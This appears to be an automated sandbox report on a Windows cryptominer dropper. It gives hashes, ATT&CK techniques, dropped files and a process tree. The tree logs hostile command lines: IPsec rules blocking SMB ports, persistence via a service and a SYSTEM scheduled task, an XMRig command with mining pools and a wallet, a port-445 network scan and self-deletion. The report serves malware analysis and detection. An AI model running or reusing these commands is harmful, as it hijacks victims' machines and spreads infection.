xmrig | b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a

Analysis

max time kernel
151s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
19-05-2022 01:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aa.exe
Size

28.1MB
MD5

f9b2e96e5044fdaa7d923d516f6206e8
SHA1

936f9c88a574fede2fd37e54189e4b69c1215163
SHA256

b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a
SHA512

c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1

Score

10^/10

xmrig miner persistence

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

awtqnk.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe C:\\Windows\\rNcAd\\awtqnk.exe"	awtqnk.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner

XMRig Miner Payload 6 IoCs

miner

Processes:

resource	yara_rule
C:\Windows\rNcAd\awtqnk.exe	xmrig
C:\Windows\rNcAd\awtqnk.exe	xmrig
behavioral2/memory/4992-134-0x0000000000400000-0x0000000002054000-memory.dmp	xmrig
behavioral2/memory/3684-175-0x0000000000400000-0x0000000002054000-memory.dmp	xmrig
C:\Windows\rNcAd\ss.exe	xmrig
behavioral2/memory/2628-179-0x0000000000400000-0x0000000000B4B000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Executes dropped EXE 3 IoCs

Processes:

awtqnk.exess.exesvchost.exe

pid process

3684 awtqnk.exe
2628 ss.exe
1052 svchost.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

awtqnk.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation awtqnk.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	awtqnk.exe

Drops file in Windows directory 64 IoCs

Processes:

awtqnk.exeaa.exe

description	ioc	process
File created	C:\Windows\rNcAd\cnli-1.dll	awtqnk.exe
File created	C:\Windows\rNcAd\iconv.dll	awtqnk.exe
File created	C:\Windows\rNcAd\libxml2.dll	awtqnk.exe
File created	C:\Windows\rNcAd\pcrecpp-0.dll	awtqnk.exe
File created	C:\Windows\rNcAd\cnli-0.dll	awtqnk.exe
File created	C:\Windows\rNcAd\libiconv-2.dll	awtqnk.exe
File created	C:\Windows\rNcAd\pcre-0.dll	awtqnk.exe
File created	C:\Windows\rNcAd\ssleay32.dll	awtqnk.exe
File created	C:\Windows\rNcAd\Cstr.fb	awtqnk.exe
File created	C:\Windows\rNcAd\qdx.bat	awtqnk.exe
File created	C:\Windows\rNcAd\chrome..xml	awtqnk.exe
File created	C:\Windows\rNcAd\coli-0.dll	awtqnk.exe
File created	C:\Windows\rNcAd\etebCore-2.x86.dll	awtqnk.exe
File created	C:\Windows\rNcAd\posh-0.dll	awtqnk.exe
File created	C:\Windows\rNcAd\trfo-2.dll	awtqnk.exe
File created	C:\Windows\rNcAd\awtqnk.exe	aa.exe
File created	C:\Windows\rNcAd\etchCore-0.x86.dll	awtqnk.exe
File created	C:\Windows\rNcAd\crli-0.dll	awtqnk.exe
File created	C:\Windows\rNcAd\dmgd-1.dll	awtqnk.exe
File created	C:\Windows\rNcAd\TFf	awtqnk.exe
File created	C:\Windows\rNcAd\adfw-2.dll	awtqnk.exe
File created	C:\Windows\rNcAd\eteb-2.dll	awtqnk.exe
File created	C:\Windows\rNcAd\exma-1.dll	awtqnk.exe
File created	C:\Windows\boy.exe	aa.exe
File created	C:\Windows\rNcAd\esco-0.dll	awtqnk.exe
File created	C:\Windows\rNcAd\etch-0.dll	awtqnk.exe
File created	C:\Windows\rNcAd\libcurl.dll	awtqnk.exe
File created	C:\Windows\rNcAd\trfo-0.dll	awtqnk.exe
File created	C:\Windows\rNcAd\zibe.dll	awtqnk.exe
File created	C:\Windows\rNcAd\ip.dll	awtqnk.exe
File created	C:\Windows\rNcAd\chrome..exe	awtqnk.exe
File created	C:\Windows\rNcAd\tucl-1.dll	awtqnk.exe
File opened for modification	C:\Windows\rNcAd\tscl.html	awtqnk.exe
File created	C:\Windows\rNcAd\Cstr.xml	awtqnk.exe
File created	C:\Windows\end.bat	awtqnk.exe
File created	C:\Windows\rNcAd\chrome..fb	awtqnk.exe
File created	C:\Windows\rNcAd\etebCore-2.x64.dll	awtqnk.exe
File created	C:\Windows\rNcAd\zlib1.dll	awtqnk.exe
File created	C:\Windows\rNcAd\svchost.exe	awtqnk.exe
File opened for modification	C:\Windows\end.bat	awtqnk.exe
File created	C:\Windows\rNcAd\ss.exe	awtqnk.exe
File created	C:\Windows\rNcAd\tucl.dll	awtqnk.exe
File created	C:\Windows\rNcAd\WinRing0x64.sys	awtqnk.exe
File created	C:\Windows\rNcAd\trch-0.dll	awtqnk.exe
File created	C:\Windows\rNcAd\pcreposix-0.dll	awtqnk.exe
File created	C:\Windows\rNcAd\posh.dll	awtqnk.exe
File created	C:\Windows\rNcAd\tibe.dll	awtqnk.exe
File created	C:\Windows\rNcAd\trch-1.dll	awtqnk.exe
File created	C:\Windows\rNcAd\trfo.dll	awtqnk.exe
File created	C:\Windows\rNcAd\s.bat	awtqnk.exe
File created	C:\Windows\rNcAd\dmgd-4.dll	awtqnk.exe
File created	C:\Windows\rNcAd\libeay32.dll	awtqnk.exe
File created	C:\Windows\rNcAd\tibe-2.dll	awtqnk.exe
File created	C:\Windows\rNcAd\tscl.html	aa.exe
File created	C:\Windows\rNcAd\adfw.dll	awtqnk.exe
File created	C:\Windows\rNcAd\etchCore-0.x64.dll	awtqnk.exe
File created	C:\Windows\rNcAd\pcla-0.dll	awtqnk.exe
File created	C:\Windows\rNcAd\riar.dll	awtqnk.exe
File created	C:\Windows\rNcAd\riar-2.dll	awtqnk.exe
File created	C:\Windows\rNcAd\tibe-1.dll	awtqnk.exe
File created	C:\Windows\rNcAd\trch.dll	awtqnk.exe
File created	C:\Windows\rNcAd\Cstr.exe	awtqnk.exe
File created	C:\Windows\rNcAd\xdvl-0.dll	awtqnk.exe
File created	C:\Windows\rNcAd\ucl.dll	awtqnk.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1828 schtasks.exe

pid	process
1828	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

awtqnk.exe

pid	process
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe
3684	awtqnk.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

ss.exe

description pid process

Token: SeLockMemoryPrivilege 2628 ss.exe
Token: SeLockMemoryPrivilege 2628 ss.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

aa.exeawtqnk.exe

pid process

4992 aa.exe
4992 aa.exe
3684 awtqnk.exe
3684 awtqnk.exe

description	pid	process
Token: SeLockMemoryPrivilege	2628	ss.exe
Token: SeLockMemoryPrivilege	2628	ss.exe

pid	process
4992	aa.exe
4992	aa.exe
3684	awtqnk.exe
3684	awtqnk.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

aa.exeawtqnk.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4992 wrote to memory of 3684	4992	aa.exe	awtqnk.exe
PID 4992 wrote to memory of 3684	4992	aa.exe	awtqnk.exe
PID 4992 wrote to memory of 3684	4992	aa.exe	awtqnk.exe
PID 4992 wrote to memory of 3628	4992	aa.exe	cmd.exe
PID 4992 wrote to memory of 3628	4992	aa.exe	cmd.exe
PID 4992 wrote to memory of 3628	4992	aa.exe	cmd.exe
PID 3684 wrote to memory of 2796	3684	awtqnk.exe	cmd.exe
PID 3684 wrote to memory of 2796	3684	awtqnk.exe	cmd.exe
PID 3684 wrote to memory of 2796	3684	awtqnk.exe	cmd.exe
PID 2796 wrote to memory of 2344	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 2344	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 2344	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 752	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 752	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 752	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 900	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 900	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 900	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 5088	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 5088	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 5088	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 4716	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 4716	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 4716	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 4768	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 4768	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 4768	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 1476	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 1476	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 1476	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 4356	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 4356	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 4356	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 3328	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 3328	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 3328	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 2012	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 2012	2796	cmd.exe	netsh.exe
PID 2796 wrote to memory of 2012	2796	cmd.exe	netsh.exe
PID 3684 wrote to memory of 1060	3684	awtqnk.exe	cmd.exe
PID 3684 wrote to memory of 1060	3684	awtqnk.exe	cmd.exe
PID 3684 wrote to memory of 1060	3684	awtqnk.exe	cmd.exe
PID 3684 wrote to memory of 932	3684	awtqnk.exe	cmd.exe
PID 3684 wrote to memory of 932	3684	awtqnk.exe	cmd.exe
PID 3684 wrote to memory of 932	3684	awtqnk.exe	cmd.exe
PID 1060 wrote to memory of 1764	1060	cmd.exe	netsh.exe
PID 1060 wrote to memory of 1764	1060	cmd.exe	netsh.exe
PID 1060 wrote to memory of 1764	1060	cmd.exe	netsh.exe
PID 932 wrote to memory of 3140	932	cmd.exe	netsh.exe
PID 932 wrote to memory of 3140	932	cmd.exe	netsh.exe
PID 932 wrote to memory of 3140	932	cmd.exe	netsh.exe
PID 1060 wrote to memory of 4484	1060	cmd.exe	netsh.exe
PID 1060 wrote to memory of 4484	1060	cmd.exe	netsh.exe
PID 1060 wrote to memory of 4484	1060	cmd.exe	netsh.exe
PID 1060 wrote to memory of 216	1060	cmd.exe	netsh.exe
PID 1060 wrote to memory of 216	1060	cmd.exe	netsh.exe
PID 1060 wrote to memory of 216	1060	cmd.exe	netsh.exe
PID 932 wrote to memory of 240	932	cmd.exe	netsh.exe
PID 932 wrote to memory of 240	932	cmd.exe	netsh.exe
PID 932 wrote to memory of 240	932	cmd.exe	netsh.exe
PID 1060 wrote to memory of 1448	1060	cmd.exe	netsh.exe
PID 1060 wrote to memory of 1448	1060	cmd.exe	netsh.exe
PID 1060 wrote to memory of 1448	1060	cmd.exe	netsh.exe
PID 932 wrote to memory of 3704	932	cmd.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\aa.exe
"C:\Users\Admin\AppData\Local\Temp\aa.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4992

C:\Windows\rNcAd\awtqnk.exe
C:\Windows\rNcAd\awtqnk.exe
2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Checks computer location settings
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:2796

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
4⤵
PID:2344

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
4⤵
PID:752

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
4⤵
PID:900

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
4⤵
PID:5088

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
4⤵
PID:4716

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
4⤵
PID:4768

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
4⤵
PID:1476

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
4⤵
PID:4356

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
4⤵
PID:3328

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
4⤵
PID:2012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1060

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
4⤵
PID:1764

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
4⤵
PID:4484

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
4⤵
PID:216

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
4⤵
PID:1448

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
4⤵
PID:3236

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
4⤵
PID:4856

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
4⤵
PID:3720

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
4⤵
PID:1056

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
4⤵
PID:4812

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
4⤵
PID:1608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:932

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
4⤵
PID:3140

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
4⤵
PID:240

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
4⤵
PID:3704

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
4⤵
PID:2304

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
4⤵
PID:5072

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
4⤵
PID:4316

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
4⤵
PID:648

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
4⤵
PID:872

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
4⤵
PID:4904

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
4⤵
PID:876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
3⤵
PID:1312

C:\Windows\SysWOW64\sc.exe
sc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"
3⤵
PID:4428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\rNcAd\qdx.bat" "
3⤵
PID:2864

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\rNcAd\awtqnk.exe" /SC ONSTART
4⤵
- Creates scheduled task(s)
PID:1828

C:\Windows\rNcAd\ss.exe
"C:\Windows\rNcAd\ss.exe" -o stratum+tcp://wk.monerogx.com:6502 -o stratum+tcp://note.monerogx.com:8666 -o stratum+tcp://wk.sdffdasdfsdfaczxfwd53.org:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=1
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\rNcAd\s.bat" "
3⤵
PID:3192

C:\Windows\rNcAd\svchost.exe
svchost.exe syn 10.127.0.0 10.127.255.255 445 /save
4⤵
- Executes dropped EXE
PID:1052

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\aa.exe"
2⤵
PID:3628

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Winlogon Helper DLL

T1004

New Service

T1050

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\end.bat
Filesize
1KB

MD5
c017d5f762ae5d67efb7d099b53cca58

SHA1
ab7f8553de7614251d76ce54aaee52f1a35e7ae6

SHA256
d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b

SHA512
856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78

Download Submit
C:\Windows\end.bat
Filesize
1KB

MD5
c017d5f762ae5d67efb7d099b53cca58

SHA1
ab7f8553de7614251d76ce54aaee52f1a35e7ae6

SHA256
d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b

SHA512
856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78

Download Submit
C:\Windows\rNcAd\awtqnk.exe
Filesize
28.1MB

MD5
f9b2e96e5044fdaa7d923d516f6206e8

SHA1
936f9c88a574fede2fd37e54189e4b69c1215163

SHA256
b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a

SHA512
c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1

Download Submit
C:\Windows\rNcAd\awtqnk.exe
Filesize
28.1MB

MD5
f9b2e96e5044fdaa7d923d516f6206e8

SHA1
936f9c88a574fede2fd37e54189e4b69c1215163

SHA256
b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a

SHA512
c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1

Download Submit
C:\Windows\rNcAd\qdx.bat
Filesize
116B

MD5
662ee857ad37429cc2fe7e71d45f531f

SHA1
3c467a477716fab2a1a6cbeac3bc373b9e52b278

SHA256
62d500efc31c01d724bf59838c705325928bff3b06b96399ff4611eb9f594414

SHA512
c2e4a3a07a82b0750bde87c6a2b39fc781d6ff604914198a3be688e3707dd5ffeb59cf19775d7d39ee2ddd770ecf26d94dcae5a85c6b17853dfca592668595f5

Download Submit
C:\Windows\rNcAd\s.bat
Filesize
335B

MD5
b5f17481d6d186362e1b989d59f4485b

SHA1
286e596314689831c647c43a2d7258e7704062bb

SHA256
92d3d97610deea1906de9c1303e5928808d65c1bb6b0653613e13c0fa81a91f5

SHA512
5918ae4392e4b7b381426cd121478e12e2f7abbab3bbdeba5f383231aaff25436442f34a8735bc8efa3ab422650cccaf03fcaf22d627a0c10e5e1adbdacb9698

Download Submit
C:\Windows\rNcAd\ss.exe
Filesize
6.7MB

MD5
8460b86a434521fe122230467dffc2a5

SHA1
f7bd0696c9201d5270cb75deb82895a85a5298a2

SHA256
812a448e4023b2b7b52dffe30e72b77b96b4f334263e1b0f2daad8e33a68143d

SHA512
fb6504aed5c99010faa00332eecdf2916393490b79b8819a1e338238fd0f21e7255550e3155fc0efbe2295858df84ffe1f703eaf9ffdd824406f80d2c7fe58dc

Download Submit
C:\Windows\rNcAd\svchost.exe
Filesize
14KB

MD5
c097fd043d3cbabcada0878505c7afa5

SHA1
966a60028a3a24268c049ffadbe1a07b83de24ce

SHA256
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc

SHA512
0837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0

Download Submit
C:\Windows\rNcAd\svchost.exe
Filesize
14KB

MD5
c097fd043d3cbabcada0878505c7afa5

SHA1
966a60028a3a24268c049ffadbe1a07b83de24ce

SHA256
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc

SHA512
0837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0

Download Submit
C:\Windows\rNcAd\tscl.html
Filesize
6B

MD5
bfc6fd80246ce526a70a1042bf4331ea

SHA1
90f0d40ca76df58f7a2cd7207fc0eadea62e41f9

SHA256
b3034d9341c8d2a4ee4183d392e65cc683292ec318f881860f66fb6ee4a90066

SHA512
3306e4020203416c699e0317aea05db1927fe8aa9da9dee1a712d6eaf650b9231a57ff84b4d31a242f766294590b354658c235c79e8442473ff021e2fce28538

Download Submit
memory/216-153-0x0000000000000000-mapping.dmp

Download
memory/240-154-0x0000000000000000-mapping.dmp

Download
memory/648-164-0x0000000000000000-mapping.dmp

Download
memory/752-138-0x0000000000000000-mapping.dmp

Download
memory/872-165-0x0000000000000000-mapping.dmp

Download
memory/876-169-0x0000000000000000-mapping.dmp

Download
memory/900-139-0x0000000000000000-mapping.dmp

Download
memory/932-148-0x0000000000000000-mapping.dmp

Download
memory/1052-182-0x0000000000000000-mapping.dmp

Download
memory/1052-185-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/1056-163-0x0000000000000000-mapping.dmp

Download
memory/1060-147-0x0000000000000000-mapping.dmp

Download
memory/1312-170-0x0000000000000000-mapping.dmp

Download
memory/1448-155-0x0000000000000000-mapping.dmp

Download
memory/1476-143-0x0000000000000000-mapping.dmp

Download
memory/1608-168-0x0000000000000000-mapping.dmp

Download
memory/1764-150-0x0000000000000000-mapping.dmp

Download
memory/1828-174-0x0000000000000000-mapping.dmp

Download
memory/2012-146-0x0000000000000000-mapping.dmp

Download
memory/2304-158-0x0000000000000000-mapping.dmp

Download
memory/2344-137-0x0000000000000000-mapping.dmp

Download
memory/2628-179-0x0000000000400000-0x0000000000B4B000-memory.dmp

Filesize
7.3MB

Download
memory/2628-177-0x0000000000000000-mapping.dmp

Download
memory/2796-135-0x0000000000000000-mapping.dmp

Download
memory/2864-172-0x0000000000000000-mapping.dmp

Download
memory/3140-151-0x0000000000000000-mapping.dmp

Download
memory/3192-180-0x0000000000000000-mapping.dmp

Download
memory/3236-157-0x0000000000000000-mapping.dmp

Download
memory/3328-145-0x0000000000000000-mapping.dmp

Download
memory/3628-133-0x0000000000000000-mapping.dmp

Download
memory/3684-175-0x0000000000400000-0x0000000002054000-memory.dmp

Filesize
28.3MB

Download
memory/3684-130-0x0000000000000000-mapping.dmp

Download
memory/3704-156-0x0000000000000000-mapping.dmp

Download
memory/3720-161-0x0000000000000000-mapping.dmp

Download
memory/4316-162-0x0000000000000000-mapping.dmp

Download
memory/4356-144-0x0000000000000000-mapping.dmp

Download
memory/4428-171-0x0000000000000000-mapping.dmp

Download
memory/4484-152-0x0000000000000000-mapping.dmp

Download
memory/4716-141-0x0000000000000000-mapping.dmp

Download
memory/4768-142-0x0000000000000000-mapping.dmp

Download
memory/4812-166-0x0000000000000000-mapping.dmp

Download
memory/4856-159-0x0000000000000000-mapping.dmp

Download
memory/4904-167-0x0000000000000000-mapping.dmp

Download
memory/4992-134-0x0000000000400000-0x0000000002054000-memory.dmp

Filesize
28.3MB

Download
memory/5072-160-0x0000000000000000-mapping.dmp

Download
memory/5088-140-0x0000000000000000-mapping.dmp

Download